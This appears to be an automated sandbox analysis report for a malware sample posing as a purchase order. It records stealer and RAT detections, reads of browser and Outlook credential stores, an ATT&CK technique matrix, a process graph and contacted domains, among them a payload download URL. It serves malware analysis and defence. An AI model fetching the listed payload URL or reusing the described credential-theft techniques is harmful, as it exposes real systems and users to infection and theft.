                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DD918C GetLocalTime,0_2_02DD918C
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DDB70C GetVersionExA,0_2_02DDB70C
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Yara detected MassLogger RAT
                          Source: Yara matchFile source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 4824, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.335e0000.11.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.30783f56.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.32f70000.9.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2da40f08.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.31996478.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2da40000.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2d5d3f56.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.319d3d90.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2ea96478.9.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.31995570.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.30784e5e.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.31996478.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.30783f56.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.3.rpkhzpuO.pif.2e8737c8.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2ead3d90.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2ead3d90.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.3.rpkhzpuO.pif.2b733e10.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.32f70f08.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.304e0000.11.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.30784e5e.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.32f70000.9.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.3.rpkhzpuO.pif.2761c6f8.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2ea95570.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.335e0000.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.3.rpkhzpuO.pif.2e8737c8.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.32f70f08.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2ea95570.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.304e0000.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.319d3d90.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.31995570.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.3.rpkhzpuO.pif.2b733e10.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2d5d3f56.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2da40000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2ea96478.9.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2da40f08.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.3.rpkhzpuO.pif.2761c6f8.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000013.00000002.23188607246.0000000030743000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000002.23112425454.000000002DA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000003.22965228435.000000002761C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000003.23062543754.000000002B733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.23190771291.0000000032F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.23191645092.00000000335E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000002.23114375641.000000002EA95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000002.23111776153.000000002D593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000003.23143070311.000000002E873000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.23190455309.0000000031995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000002.23115572603.00000000304E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Yara detected Telegram RAT
                          Source: Yara matchFile source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 4824, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Tries to steal Mail credentials (via file / registry access)
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: Yara matchFile source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000006.00000002.24180228176.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 4824, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected MassLogger RAT
                          Source: Yara matchFile source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 4824, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.335e0000.11.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.30783f56.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.32f70000.9.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2da40f08.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.31996478.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2da40000.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2d5d3f56.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.319d3d90.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2ea96478.9.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.31995570.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.30784e5e.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.31996478.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.30783f56.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.3.rpkhzpuO.pif.2e8737c8.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2ead3d90.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2ead3d90.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.3.rpkhzpuO.pif.2b733e10.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.32f70f08.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.304e0000.11.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.30784e5e.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.32f70000.9.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.3.rpkhzpuO.pif.2761c6f8.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2ea95570.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.335e0000.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.3.rpkhzpuO.pif.2e8737c8.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.32f70f08.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2ea95570.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.304e0000.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.319d3d90.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.rpkhzpuO.pif.31995570.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.3.rpkhzpuO.pif.2b733e10.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2d5d3f56.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2da40000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2ea96478.9.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2da40f08.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.3.rpkhzpuO.pif.2761c6f8.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000013.00000002.23188607246.0000000030743000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000002.23112425454.000000002DA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000003.22965228435.000000002761C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000003.23062543754.000000002B733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.23190771291.0000000032F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.23191645092.00000000335E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000002.23114375641.000000002EA95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000002.23111776153.000000002D593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000003.23143070311.000000002E873000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.23190455309.0000000031995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000002.23115572603.00000000304E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Yara detected Telegram RAT
                          Source: Yara matchFile source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 4824, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire Infrastructure1
                          Valid Accounts                          		12
                          Native API                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		11
                          Disable or Modify Tools                          		1
                          OS Credential Dumping                          		1
                          System Time Discovery                          		Remote Services11
                          Archive Collected Data                          		1
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Shared Modules                          		1
                          Valid Accounts                          		1
                          Valid Accounts                          		11
                          Deobfuscate/Decode Files or Information                          		1
                          Input Capture                          		1
                          System Network Connections Discovery                          		Remote Desktop Protocol1
                          Data from Local System                          		11
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter                          		1
                          Scheduled Task/Job                          		1
                          Access Token Manipulation                          		3
                          Obfuscated Files or Information                          		Security Account Manager2
                          File and Directory Discovery                          		SMB/Windows Admin Shares1
                          Screen Capture                          		2
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts1
                          Scheduled Task/Job                          		21
                          Registry Run Keys / Startup Folder                          		311
                          Process Injection                          		3
                          Software Packing                          		NTDS36
                          System Information Discovery                          		Distributed Component Object Model1
                          Email Collection                          		113
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                          Scheduled Task/Job                          		1
                          Timestomp                          		LSA Secrets341
                          Security Software Discovery                          		SSH1
                          Input Capture                          		Fallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                          Registry Run Keys / Startup Folder                          		1
                          DLL Side-Loading                          		Cached Domain Credentials41
                          Virtualization/Sandbox Evasion                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                          Masquerading                          		DCSync2
                          Process Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          Valid Accounts                          		Proc Filesystem1
                          Application Window Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                          Access Token Manipulation                          		/etc/passwd and /etc/shadow1
                          System Network Configuration Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
                          Virtualization/Sandbox Evasion                          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
                          Process Injection                          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583547 Sample: PO_B2W984.com Startdate: 03/01/2025 Architecture: WINDOWS Score: 100 73 reallyfreegeoip.org 2->73 75 lwaziacademy.com 2->75 77 2 other IPs or domains 2->77 97 Submitted file has a suspicious file extension 2->97 99 Found malware configuration 2->99 101 Malicious sample detected (through community Yara rule) 2->101 105 19 other signatures 2->105 10 PO_B2W984.com 1 10 2->10         started        15 Oupzhkpr.PIF 2->15         started        17 Oupzhkpr.PIF 2->17         started        signatures3 103 Tries to detect the country of the analysis system (by using the IP) 73->103 process4 dnsIp5 83 lwaziacademy.com 41.185.8.252, 443, 49746, 49747 GridhostZA South Africa 10->83 65 C:\Users\Public\Libraries\rpkhzpuO.pif, PE32 10->65 dropped 67 C:\Users\Public\Libraries\Oupzhkpr.PIF, PE32 10->67 dropped 69 C:\Users\Public\Oupzhkpr.url, MS 10->69 dropped 71 2 other malicious files 10->71 dropped 111 Drops PE files with a suspicious file extension 10->111 113 Writes to foreign memory regions 10->113 115 Allocates memory in foreign processes 10->115 117 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 10->117 19 rpkhzpuO.pif 6 10->19         started        23 cmd.exe 1 10->23         started        119 Multi AV Scanner detection for dropped file 15->119 121 Machine Learning detection for dropped file 15->121 123 Sample uses process hollowing technique 15->123 25 cmd.exe 15->25         started        27 rpkhzpuO.pif 15->27         started        125 Sample is not signed and drops a device driver 17->125 127 Allocates many large memory junks 17->127 29 cmd.exe 17->29         started        31 rpkhzpuO.pif 17->31         started        file6 signatures7 process8 file9 61 C:\Users\user\AppData\...\Trading_AIBot.exe, PE32 19->61 dropped 63 C:\Users\user\AppData\...\Microsofts.exe, PE32 19->63 dropped 107 Detected unpacking (changes PE section rights) 19->107 109 Detected unpacking (overwrites its own PE header) 19->109 33 Trading_AIBot.exe 5 19->33         started        37 Microsofts.exe 15 2 19->37         started        40 conhost.exe 23->40         started        42 conhost.exe 25->42         started        44 conhost.exe 29->44         started        signatures10 process11 dnsIp12 59 C:\Users\user\AppData\Roaming\...\apihost.exe, PE32 33->59 dropped 85 Antivirus detection for dropped file 33->85 87 Multi AV Scanner detection for dropped file 33->87 89 Machine Learning detection for dropped file 33->89 95 3 other signatures 33->95 46 apihost.exe 33->46         started        49 powershell.exe 23 33->49         started        51 schtasks.exe 33->51         started        79 checkip.dyndns.com 132.226.8.169, 49748, 80 UTMEMUS United States 37->79 81 reallyfreegeoip.org 104.21.67.152, 443, 49749 CLOUDFLARENETUS United States 37->81 91 Tries to steal Mail credentials (via file / registry access) 37->91 93 Tries to harvest and steal browser information (history, passwords, etc) 37->93 file13 signatures14 process15 signatures16 129 Antivirus detection for dropped file 46->129 131 Machine Learning detection for dropped file 46->131 133 Loading BitLocker PowerShell Module 49->133 53 conhost.exe 49->53         started        55 WmiPrvSE.exe 49->55         started        57 conhost.exe 51->57         started        process17

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          PO_B2W984.com27%ReversingLabsWin32.Trojan.Generic
                          PO_B2W984.com36%VirustotalBrowse
                          PO_B2W984.com100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\Microsofts.exe100%AviraTR/ATRAPS.Gen
                          C:\Users\user\AppData\Roaming\ACCApi\apihost.exe100%AviraTR/Dropper.Gen
                          C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe100%AviraTR/Dropper.Gen
                          C:\Users\user\AppData\Local\Temp\Microsofts.exe100%Joe Sandbox ML
                          C:\Users\Public\Libraries\Oupzhkpr.PIF100%Joe Sandbox ML
                          C:\Users\user\AppData\Roaming\ACCApi\apihost.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\Microsofts.exe91%ReversingLabsByteCode-MSIL.Spyware.Snakekeylogger
                          C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe79%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                          C:\Users\Public\Libraries\Oupzhkpr.PIF27%ReversingLabsWin32.Trojan.Generic
                          C:\Users\Public\Libraries\rpkhzpuO.pif3%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://wdcp.mit0%Avira URL Cloudsafe
                          http://pesterbdd.com/images/Pester.png40%Avira URL Cloudsafe
                          http://www.microsoft.co0%Avira URL Cloudsafe
                          http://reallyfreegeoip.orgd0%Avira URL Cloudsafe
                          https://lwaziacademy.com/wps/200_Oupzhkprnvw0%Avira URL Cloudsafe
                          https://lwaziacademy.com/0%Avira URL Cloudsafe
                          http://checkip.dyndns.orgd0%Avira URL Cloudsafe
                          http://checkip.dyndns.comd0%Avira URL Cloudsafe
                          https://lwaziacademy.com/wps/2000%Avira URL Cloudsafe
                          http://ocsp.sectigo.com0C0%Avira URL Cloudsafe
                          http://www.pmail.com00%Avira URL Cloudsafe
                          https://lwaziacademy.com/wps/200_OupzhkprnvwE0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          reallyfreegeoip.org
                          		104.21.67.152
                          		truefalse
                            		high
                            lwaziacademy.com
                            		41.185.8.252
                            		truetrue
                              		unknown
                              checkip.dyndns.com
                              		132.226.8.169
                              		truefalse
                                		high
                                checkip.dyndns.org
                                		unknown
                                		unknownfalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  https://reallyfreegeoip.org/xml/102.129.153.238false
                                    		high
                                    https://lwaziacademy.com/wps/200_Oupzhkprnvwtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://checkip.dyndns.org/false
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://pesterbdd.com/images/Pester.png4powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://sectigo.com/CPS0PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://wdcp.mitrpkhzpuO.pif, 00000013.00000003.23143070311.000000002E8BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
